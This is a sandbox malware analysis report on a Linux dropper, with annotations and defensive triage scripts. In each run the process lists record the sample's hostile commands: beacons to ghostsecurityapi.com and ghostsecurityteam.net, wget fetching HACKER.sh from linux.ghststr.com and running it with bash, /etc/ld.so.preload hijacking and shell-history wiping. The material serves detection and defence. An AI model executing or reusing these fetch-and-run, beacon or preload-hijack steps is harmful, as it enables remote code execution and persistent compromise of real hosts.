Analysis Overview
SHA256
03f504de2e804c515de12411e431085f509a593c5ec8e512adb0641eed87f287
Threat Level: Likely malicious
The file f62d2741ab07c859c2036988259d0b45_JaffaCakes118 was found to be: Likely malicious.
Malicious Activity Summary
Modifies the dynamic linker configuration file (the sample's own process opens /etc/ld.so.preload for writing in every behavioral run; this is the one signature attributable to the sample itself rather than to the tools it launches)
Checks CPU configuration (raised by /usr/bin/curl reading /proc/cpuinfo on the armhf run, a normal library start-up read, not by the sample's own code)
Reads runtime system information (raised by curl, sed, mkdir and dpkg reading /proc, i.e. by the helper tools the sample spawns)
Writes file to tmp directory (apt-get's fileutl.message.* scratch files from `apt-get install curl -y`, plus wget saving the second-stage script as /tmp/.../t.sh)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported: 2024-04-17 16:18
Signatures: (none listed)
Analysis: behavioral2
Detonation Overview
Submitted: 2024-04-17 16:18
Reported: 2024-04-17 16:21
Platform: debian9-armhf-20240226-en
Max time kernel: 13s
Max time network: 17s
Command Line: (none recorded)
Signatures
Modifies the dynamic linker configuration file
| Description | Indicator | Process | Target |
| File opened for modification | /etc/ld.so.preload | /tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118 | N/A |
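The mechanism behind this signature is worth a host-side check, so here is an added triage script; it is not code from the report or from the sample. /etc/ld.so.preload is read by the dynamic linker at every exec of a dynamically linked program, and every shared object listed in it is mapped before the program's own libraries, so an attacker-controlled entry can hook libc calls such as readdir, open or connect in every new process and hide files, processes or sockets (the classic userland rootkit, ATT&CK T1574.006 Dynamic Linker Hijacking). The function takes the file path as an argument so it can be pointed at a mounted image or, as in the demonstration at the end, at a constructed file; it assumes glibc's file format (entries separated by whitespace or ':', text after '#' ignored) and GNU coreutils `stat -c %U` for the owner check.

```shell
#!/bin/sh
# Added example, not code from the report or from the sample: a triage
# check for an attacker-controlled /etc/ld.so.preload. Assumptions:
# glibc's file format (entries separated by whitespace or ':', text
# after '#' ignored) and GNU coreutils 'stat -c %U' for the owner check.

# Print each preload entry on its own line, ignoring comments and blanks.
# Takes the file path so the check can run against a mounted image or a
# constructed test file instead of the live /etc/ld.so.preload.
preload_entries() {
  [ -f "$1" ] || return 0
  sed 's/#.*//' "$1" | tr ': \t' '\n\n\n' | grep -v '^$' || true
}

# Directories where a legitimately installed shared object never lives
# but where a dropper that only owns a temp directory would put one.
in_writable_dir() {
  case "$1" in
    /tmp/*|/var/tmp/*|/dev/shm/*) return 0 ;;
    *) return 1 ;;
  esac
}

# Print one finding per entry and return 1 if the file lists anything at
# all: on a clean host /etc/ld.so.preload is absent or empty, so any
# entry deserves a look, and the tag says which to look at first.
audit_ld_preload() {
  file=${1:-/etc/ld.so.preload}
  status=0
  for lib in $(preload_entries "$file"); do
    status=1
    if in_writable_dir "$lib"; then
      echo "TMPPATH  $lib (shared object loaded from a world-writable directory)"
    elif [ ! -e "$lib" ]; then
      echo "MISSING  $lib (listed but not on disk; the linker warns on every exec)"
    elif [ "$(stat -c %U "$lib" 2>/dev/null)" != root ]; then
      echo "NONROOT  $lib (not owned by root)"
    else
      echo "PRESENT  $lib (inspect with: readelf -d $lib; dpkg -S $lib)"
    fi
  done
  return $status
}

# Stand-alone demonstration on a constructed file (never touches /etc).
demo_dir=$(mktemp -d /tmp/ldaudit.XXXXXX)
: > "$demo_dir/libhide.so"
printf '# injected by dropper\n%s\n/lib/does-not-exist.so\n' "$demo_dir/libhide.so" > "$demo_dir/ld.so.preload"
audit_ld_preload "$demo_dir/ld.so.preload" || echo "verdict: preload entries present, investigate"
rm -rf "$demo_dir"
```

Run it as `audit_ld_preload` with no argument on a live host, or pass the path under a mounted image root. A non-zero return is the signal; the tag on each line only orders the follow-up, since even a PRESENT entry owned by root can be a dropped library once the attacker has root.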
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/filesystems | /bin/sed | N/A |
| File opened for reading | /proc/self/fd | N/A | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/fileutl.message.8xapVZ | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/.../t.sh | /usr/bin/wget | N/A |
| File opened for modification | /tmp/fileutl.message.rBaWlO | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.GXSL7N | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.Yq9DyS | /usr/bin/apt-get | N/A |
Processes
/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118
[/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118]
/bin/sed
[sed -En s/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p]
/usr/bin/apt-get
[apt-get install curl -y]
/usr/bin/dpkg
[/usr/bin/dpkg --print-foreign-architectures]
/usr/bin/dpkg
[/usr/bin/dpkg --print-foreign-architectures]
/usr/bin/curl
[curl https://ghostsecurityapi.com/1/index.php?host= -O /dev/null]
/usr/bin/wget
[wget -q https://ghostsecurityapi.com/1/index.php?host= -O /dev/null]
/usr/bin/curl
[curl https://ghostsecurityteam.net/1/ -o /dev/null]
/usr/bin/wget
[wget https://ghostsecurityteam.net/1/ -O /dev/null]
/usr/bin/curl
[curl https://ghostsecurityteam.net/2/ -o /dev/null]
/usr/bin/wget
[wget https://ghostsecurityteam.net/2/ -O /dev/null]
/bin/mkdir
[mkdir ...]
/usr/bin/wget
[wget --quiet http://linux.ghststr.com/LLLOL/HACKER.sh -O t.sh]
/bin/bash
[bash t.sh]
/bin/rm
[rm -rf /tmp/...]
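The sed expression in the process list is the dropper's address-harvesting step: it drops 127.0.0.1 and prints the IPv4 address that follows `inet` or `inet addr:`, i.e. the host's non-loopback address in either net-tools ifconfig format, and that value is what the empty `host=` parameter of the ghostsecurityapi.com beacon is meant to carry. The block below is an added example, not code from the report or from the sample: it runs the sed expression exactly as recorded over constructed ifconfig output of both formats and assembles the beacon URL as a string, without sending anything. Two caveats on the recorded commands: curl's `-O` is `--remote-name`, not an output path, so `curl ... -O /dev/null` saves the response under the URL's file name in the working directory and then treats `/dev/null` as a second URL, a defect in the dropper's own script; and wget creates its `-O` target before the transfer begins, which is why the `/tmp/.../t.sh` write is recorded even though no HTTP session to linux.ghststr.com appears in any network table.

```shell
#!/bin/sh
# Added example, not code from the report or from the sample: reproduces
# the dropper's address-harvesting step with the sed expression from the
# process list and shows what would fill the beacon's empty "host=".
# The ifconfig output below is constructed, covering both the legacy
# "inet addr:" and the newer "inet " line formats.

# The sed expression exactly as recorded in the sandbox process list.
extract_ipv4() {
  sed -En 's/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p'
}

# Constructed sample of legacy net-tools ifconfig output.
sample_ifconfig_legacy() {
  cat <<'EOF'
eth0      Link encap:Ethernet  HWaddr 02:42:ac:11:00:02
          inet addr:172.17.0.2  Bcast:172.17.255.255  Mask:255.255.0.0
          inet6 addr: fe80::42:acff:fe11:2/64 Scope:Link
lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
EOF
}

# Constructed sample of the newer ifconfig output format.
sample_ifconfig_new() {
  cat <<'EOF'
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.0.2.15  netmask 255.255.255.0  broadcast 10.0.2.255
        inet6 fe80::a00:27ff:fe4e:66a1  prefixlen 64  scopeid 0x20<link>
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
EOF
}

# Assemble the beacon URL from the process list; "host=" carries the
# first non-loopback IPv4 address sed emits, or stays empty when sed
# emits nothing (as in all four sandbox runs). Nothing is sent.
beacon_url() {
  # $1: name of a function producing ifconfig-style text
  host=$("$1" | extract_ipv4 | head -n 1)
  printf 'https://ghostsecurityapi.com/1/index.php?host=%s\n' "$host"
}

# Stand-alone demonstration.
echo "legacy format -> $(sample_ifconfig_legacy | extract_ipv4 | tr '\n' ' ')"
echo "new format    -> $(sample_ifconfig_new | extract_ipv4 | tr '\n' ' ')"
echo "empty input   -> $(printf '' | extract_ipv4 | tr '\n' ' ')"
beacon_url sample_ifconfig_legacy
```

The loopback line survives the first substitution as `inet addr:  Mask:...`, which no longer has digits directly after `inet`/`addr:`, so the second substitution fails and `-n` suppresses the line; `inet6` lines never match because the pattern requires `inet` followed by a space. The empty `host=` in the report therefore means the pipeline found no `inet` line at all in the sandbox (for example because ifconfig is absent on the image), not that the sample skipped the step.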
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | ghostsecurityapi.com | udp |
| US | 1.1.1.1:53 | ghostsecurityapi.com | udp |
| US | 1.1.1.1:53 | ghostsecurityapi.com | udp |
| US | 1.1.1.1:53 | ghostsecurityapi.com | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | linux.ghststr.com | udp |
| US | 1.1.1.1:53 | linux.ghststr.com | udp |
Files
/root/.bash_history
| MD5 | 68b329da9893e34099c7d8ad5cb9c940 |
| SHA1 | adc83b19e793491b1c6ea0fd8b46cd9f32e592fc |
| SHA256 | 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b |
| SHA512 | be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09 |
These are the digests of a single newline byte (MD5 68b329da9893e34099c7d8ad5cb9c940 is md5 of "\n"), so the shell history was written back containing nothing but a newline. That is a truncation, not an append, and reads as a history-clearing anti-forensics step; the report records the write but not the command that performed it. The same file and hashes appear in the other three runs.
Analysis: behavioral3
Detonation Overview
Submitted: 2024-04-17 16:18
Reported: 2024-04-17 16:21
Platform: debian9-mipsbe-20240226-en
Max time kernel: 14s
Max time network: 16s
Command Line: (none recorded)
Signatures
Modifies the dynamic linker configuration file
| Description | Indicator | Process | Target |
| File opened for modification | /etc/ld.so.preload | /tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
| File opened for reading | /proc/filesystems | /bin/sed | N/A |
| File opened for reading | /proc/self/fd | N/A | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/fileutl.message.2IC6wm | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.Qzd0iI | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.SRY9a9 | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.SudRtB | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/.../t.sh | /usr/bin/wget | N/A |
Processes
/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118
[/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118]
/bin/sed
[sed -En s/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p]
/usr/bin/apt-get
[apt-get install curl -y]
/usr/bin/dpkg
[/usr/bin/dpkg --print-foreign-architectures]
/usr/bin/dpkg
[/usr/bin/dpkg --print-foreign-architectures]
/usr/bin/curl
[curl https://ghostsecurityapi.com/1/index.php?host= -O /dev/null]
/usr/bin/wget
[wget -q https://ghostsecurityapi.com/1/index.php?host= -O /dev/null]
/usr/bin/curl
[curl https://ghostsecurityteam.net/1/ -o /dev/null]
/usr/bin/wget
[wget https://ghostsecurityteam.net/1/ -O /dev/null]
/usr/bin/curl
[curl https://ghostsecurityteam.net/2/ -o /dev/null]
/usr/bin/wget
[wget https://ghostsecurityteam.net/2/ -O /dev/null]
/bin/mkdir
[mkdir ...]
/usr/bin/wget
[wget --quiet http://linux.ghststr.com/LLLOL/HACKER.sh -O t.sh]
/bin/bash
[bash t.sh]
/bin/rm
[rm -rf /tmp/...]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | ghostsecurityapi.com | udp |
| US | 1.1.1.1:53 | ghostsecurityapi.com | udp |
| US | 1.1.1.1:53 | ghostsecurityapi.com | udp |
| US | 1.1.1.1:53 | ghostsecurityapi.com | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | linux.ghststr.com | udp |
| US | 1.1.1.1:53 | linux.ghststr.com | udp |
Files
/root/.bash_history
| MD5 | 68b329da9893e34099c7d8ad5cb9c940 |
| SHA1 | adc83b19e793491b1c6ea0fd8b46cd9f32e592fc |
| SHA256 | 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b |
| SHA512 | be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09 |
Analysis: behavioral4
Detonation Overview
Submitted: 2024-04-17 16:18
Reported: 2024-04-17 16:21
Platform: debian9-mipsel-20240226-en
Max time kernel: 19s
Max time network: 20s
Command Line: (none recorded)
Signatures
Modifies the dynamic linker configuration file
| Description | Indicator | Process | Target |
| File opened for modification | /etc/ld.so.preload | /tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
| File opened for reading | /proc/filesystems | /bin/sed | N/A |
| File opened for reading | /proc/self/fd | N/A | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.../t.sh | /usr/bin/wget | N/A |
| File opened for modification | /tmp/fileutl.message.SCA3Ao | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.SgW38J | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.4AOdCe | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.GaCaCK | /usr/bin/apt-get | N/A |
Processes
/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118
[/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118]
/bin/sed
[sed -En s/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p]
/usr/bin/apt-get
[apt-get install curl -y]
/usr/bin/dpkg
[/usr/bin/dpkg --print-foreign-architectures]
/usr/bin/dpkg
[/usr/bin/dpkg --print-foreign-architectures]
/usr/bin/curl
[curl https://ghostsecurityapi.com/1/index.php?host= -O /dev/null]
/usr/bin/wget
[wget -q https://ghostsecurityapi.com/1/index.php?host= -O /dev/null]
/usr/bin/curl
[curl https://ghostsecurityteam.net/1/ -o /dev/null]
/usr/bin/wget
[wget https://ghostsecurityteam.net/1/ -O /dev/null]
/usr/bin/curl
[curl https://ghostsecurityteam.net/2/ -o /dev/null]
/usr/bin/wget
[wget https://ghostsecurityteam.net/2/ -O /dev/null]
/bin/mkdir
[mkdir ...]
/usr/bin/wget
[wget --quiet http://linux.ghststr.com/LLLOL/HACKER.sh -O t.sh]
/bin/bash
[bash t.sh]
/bin/rm
[rm -rf /tmp/...]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | ghostsecurityapi.com | udp |
| US | 1.1.1.1:53 | ghostsecurityapi.com | udp |
| US | 1.1.1.1:53 | ghostsecurityapi.com | udp |
| US | 1.1.1.1:53 | ghostsecurityapi.com | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | linux.ghststr.com | udp |
| US | 1.1.1.1:53 | linux.ghststr.com | udp |
Files
/root/.bash_history
| MD5 | 68b329da9893e34099c7d8ad5cb9c940 |
| SHA1 | adc83b19e793491b1c6ea0fd8b46cd9f32e592fc |
| SHA256 | 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b |
| SHA512 | be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09 |
Analysis: behavioral1
Detonation Overview
Submitted: 2024-04-17 16:18
Reported: 2024-04-17 16:21
Platform: ubuntu1804-amd64-20240226-en
Max time kernel: 6s
Max time network: 135s
Command Line: (none recorded)
Signatures
Modifies the dynamic linker configuration file
| Description | Indicator | Process | Target |
| File opened for modification | /etc/ld.so.preload | /tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
| File opened for reading | /proc/filesystems | /bin/sed | N/A |
| File opened for reading | /proc/self/fd | N/A | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/fileutl.message.jPHFPi | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.WW6N6L | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.PfjOK0 | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.z8f0Jt | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.aZrqJ7 | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.x1ShXA | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.jwg07S | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.J8dblm | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.VOjKzP | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.Bn7ROW | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.imb1Wp | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.jbUkxE | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.bMS5sx | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/.../t.sh | /usr/bin/wget | N/A |
| File opened for modification | /tmp/fileutl.message.MgHAgI | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.7yNJnb | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.5jSxc4 | /usr/bin/apt-get | N/A |
Processes
/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118
[/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118]
/bin/sed
[sed -En s/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p]
/usr/bin/apt-get
[apt-get install curl -y]
/usr/bin/dpkg
[/usr/bin/dpkg --print-foreign-architectures]
/usr/bin/dpkg
[/usr/bin/dpkg --print-foreign-architectures]
/usr/bin/curl
[curl https://ghostsecurityapi.com/1/index.php?host= -O /dev/null]
/usr/bin/wget
[wget -q https://ghostsecurityapi.com/1/index.php?host= -O /dev/null]
/usr/bin/curl
[curl https://ghostsecurityteam.net/1/ -o /dev/null]
/usr/bin/wget
[wget https://ghostsecurityteam.net/1/ -O /dev/null]
/usr/bin/curl
[curl https://ghostsecurityteam.net/2/ -o /dev/null]
/usr/bin/wget
[wget https://ghostsecurityteam.net/2/ -O /dev/null]
/bin/mkdir
[mkdir ...]
/usr/bin/wget
[wget --quiet http://linux.ghststr.com/LLLOL/HACKER.sh -O t.sh]
/bin/bash
[bash t.sh]
/bin/rm
[rm -rf /tmp/...]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| US | 1.1.1.1:53 | ghostsecurityapi.com | udp |
| US | 1.1.1.1:53 | ghostsecurityapi.com | udp |
| US | 151.101.130.49:443 | | tcp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | linux.ghststr.com | udp |
| US | 1.1.1.1:53 | linux.ghststr.com | udp |
| US | 151.101.65.91:443 | | tcp |
| GB | 195.181.164.14:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| US | 1.1.1.1:53 | cdn.fwupd.org | udp |
| US | 1.1.1.1:53 | cdn.fwupd.org | udp |
| US | 151.101.194.49:443 | cdn.fwupd.org | tcp |
| US | 151.101.65.91:443 | | tcp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 89.187.167.5:443 | 1527653184.rsc.cdn77.org | tcp |
Only DNS lookups are recorded for ghostsecurityapi.com, ghostsecurityteam.net and linux.ghststr.com; no TCP session to any of them appears in this run or in the three Debian runs, so the second stage requested from linux.ghststr.com/LLLOL/HACKER.sh was not retrieved during detonation and `bash t.sh` ran against whatever wget left in the file. The 224.0.0.251:5353 packet is mDNS multicast, the cdn.fwupd.org traffic is consistent with the Ubuntu firmware-update daemon refreshing its metadata, and the 443/tcp sessions with no domain in the Domain column are not attributed by the log; none of these can be tied to the sample from this table alone. The three attacker domains and the HACKER.sh URL are the indicators worth blocking and hunting for.
Files
/tmp/fileutl.message.z8f0Jt
| MD5 | 373fe2f2ef99005d2550a482f09a3e51 |
| SHA1 | 68e6572b55b1e77f7d171ebac7b2579b7a6bd51d |
| SHA256 | 7552d5ab0c3879756a860aaab8e7c2f8ffb9409ea9ff9e65fc046ba5c519ebe5 |
| SHA512 | def9e854b824d2fddc6a15f898be73cfb679ac38563f5af854546f49c9d5d2316a40176dc41d6b360bda7b65de53863a53e4eedadf6336000b031b77a113607b |
/root/.bash_history
| MD5 | 68b329da9893e34099c7d8ad5cb9c940 |
| SHA1 | adc83b19e793491b1c6ea0fd8b46cd9f32e592fc |
| SHA256 | 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b |
| SHA512 | be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09 |